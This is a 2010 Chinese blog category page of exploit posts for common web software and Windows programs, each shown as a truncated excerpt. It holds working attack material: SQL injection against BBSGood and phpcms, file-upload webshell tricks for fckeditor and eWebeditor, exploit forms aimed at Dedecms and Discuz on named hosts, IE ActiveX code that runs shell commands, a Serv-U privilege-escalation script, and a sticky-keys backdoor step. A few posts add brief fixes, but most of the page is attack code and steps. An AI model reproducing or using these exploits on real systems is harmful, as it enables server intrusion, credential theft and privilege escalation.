文章列表
 
您正在查看 "漏洞利用" 分类下的文章

BBSGood论坛程序bottom.asp页面SQL注入漏洞
2010-05-13 22:32

漏洞分析:


在文件bottom.asp中:
key=trim(Request("key")) //第25行
key2=key
key3=key
select case mode
case 1
    if instr(1,key," ")>0 then
        str=Split(key," ")
        key=""
        key3=""
        For ii=0 to UBound(st

阅读全文>>
类别:漏洞利用|评论(0) |浏览(140)
 
BBSGood论坛indexlabel.asp sql注入漏洞
2010-05-13 22:30

在文件indexlabel.asp中:
sql="select top 1 Admin,UserName,Password from BBSGood_Admin where UserName='"&Request.Cookies(bbsinfo&"adminuser")&"' "   //第115行
Set rs = Server.CreateObject("ADODB.Recordset")
程序没有验证用户是否登陆,导致cookies的值没有过滤而产生注入漏洞

测试方法:
修改cookies值注入

解决方案:
增加用户登陆验证

阅读全文>>
类别:漏洞利用|评论(0) |浏览(91)
 
phpcms2008 yp.php 注入利用 EXP
2010-05-09 23:29

发布日期:2010-05.05   
影响版本:phpcms2008
漏洞描述: product.php 注入漏洞,暴出管理员用户密码。
exp代码:
<?php
ini_set("max_execution_time",0);
error_reporting(7);
function usage()
{
global $argv;
exit(

"\n[+] Usage : php ".$argv[0]." <hostname> <path>".
"\n[+] Ex. : php ".$argv[0]." localhost /yp".
"\n\n");
}

function query(

阅读全文>>
类别:漏洞利用|评论(0) |浏览(97)
 
暴风影音的最新0DAY_2010.05.06
2010-05-06 23:38

# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit
# EDB-ID: 12516
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Lufeng Li and Qingshan Li
# Published: 2010-05-06
# Verified: no
# Download Exploit Code
# Download N/A

view sourceprint?#!/usr/bin/env python

  

#################################################################

#

# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit

阅读全文>>
类别:漏洞利用|评论(0) |浏览(371)
 
phpcms2008 sp3注入漏洞
2010-05-03 21:50

注入yp/company.php?where=%23

进入后台访问
http://www.digua8.cn/admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php

阅读全文>>
类别:漏洞利用|评论(0) |浏览(187)
 
fckeditor 2.63 漏洞利用
2010-05-02 22:47

http://www.digua8.cn/fckeditor/editor/filemanager/connectors/test.html

http://www.digua8.cn/fckeditor/editor/filemanager/connectors/uploadtest.html

这个两个页面,是死的关键。上传digua.asa;.jpg

上传之后,路径自然出来了。马为digua.asa; 注意,后面有个;

除了2.63.

Fckeditor 基本上每个

阅读全文>>
类别:漏洞利用|评论(0) |浏览(314)
 
IE再出漏洞,微软尚未修补
2010-03-20 18:03

漏洞原理:
chm帮助文件可以通过ActiveX控件调用进行信息交换,当我们进行不正常的加载帮助文件时,造成了漏洞的产生。
我们用最简单的最安全的使用最广的微软内置程序记事本看看,你可能不清楚小小的一个txt文件被打开时在本地磁盘和NetBIOS中的分额,当用户进行信息交互时,如果改文件是在远程网络共享,微软说,chm文件运行在一个安全区域,而本地计算机不会做其他的工作,但是,这部分正确,在一个表的内容资料的交换机制中,本地”的对象指向一个标记参数JavaScript的网址,当用户点击时,JavaScript URL是下

阅读全文>>
类别:漏洞利用|评论(0) |浏览(221)
 
Internet Explorer 无限循环拒绝服务漏洞
2010-03-20 17:53

该漏洞存在于ActiveX控件中.
攻击者可以构造恶意页面诱使用户访问,恶意代码可运行任何Windows命令,消耗大量内存,导致访问者IE浏览器崩溃。

测试代码

<html>
<title>ie test</title>
<head>
<script type="text/javascript">
function sucks()
{
var shell=new ActiveXObject("wscript.shell");
shell.Run("calc", 1);
}
function asheesh()
{
s

阅读全文>>
类别:漏洞利用|评论(0) |浏览(104)
 
711企业网站管理程序V6.0上传漏洞EXP
2010-02-24 20:00


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body leftmargin="0" topmargin="0" bgcolor="#CEDBFF">
  

阅读全文>>
类别:漏洞利用|评论(0) |浏览(143)
 
eWebeditoR3.8 for php任意文件上传EXP
2010-02-15 12:50

<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multipart/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=u

阅读全文>>
类别:漏洞利用|评论(0) |浏览(220)
 
DEDECMS V55漏洞利用
2010-02-09 21:36

<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By digua</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By digua---------- <br /><br />
<form action=http://www.digua8.cn/include/dialog/select_soft_post.php method='POST'

enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />

阅读全文>>
类别:漏洞利用|评论(0) |浏览(318)
 
完美支持serv-u7,serv-u8,serv-u9的asp本地提权exp.
2010-02-08 20:32

<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
Function httpopen(neirong,fangshi,dizhi,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi,dizhi,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length

阅读全文>>
类别:漏洞利用|评论(0) |浏览(698)
 
360安全卫士提权利用工具
2010-02-06 14:56


在webshell下运行360test.exe

成功后,3389到服务器,按5下shift,得到一个cmd

下载地址:

阅读全文>>
类别:漏洞利用|评论(0) |浏览(121)
 
cookies欺骗突破防注入程序代码
2010-02-05 3:29

<%
JmdcwName=request("jmdcw")
' 注入中转站 COOKIE 版,BY 地瓜

JmdcwName=escape(JmdcwName)
JmStr="ID="&JmdcwName
JMUrl="http://bbs.hackfans.com.cn/Show_Infos.Asp"
JmRef="http://bbs.hanckfans.com.cn/Show_Infos.Asp"
JmCok="ASPSESSIONIDAQACTAQB=HKFHJOPDOMAIKGMPGBJJDKLJ;"
JmCok=

阅读全文>>
类别:漏洞利用|评论(0) |浏览(169)
 
Discuz!7.1-7.2 漏洞
2010-02-03 8:49

<title>Dz7.1-7.2 EXP</title>
<style type="text/css">
<!--
body,td,th {
color: #FF0000;
}
body {
background-color: #000000;
}
.STYLE1 {font-size: x-large}
.STYLE2 {font-size: xx-large}
-->
</style><form method="post" action="http://bbs.hackfans.com.cn/misc.php" enctype="multipart/form-data">
帖子ID,指定一个<

阅读全文>>
类别:漏洞利用|评论(0) |浏览(73)
 
 
   
 
 
文章分类
 
   
 
文章存档
 
     
 
最新文章评论
  

又用你那破电脑架设的哇
 

怎么删除这个隐藏的用户呢?
 

杯具啊
 

我拿去玩玩 地瓜好久不见了 潜水啊
 

无法运行
   
帮助中心 | 空间客服 | 投诉中心 | 空间协议
©2012 Baidu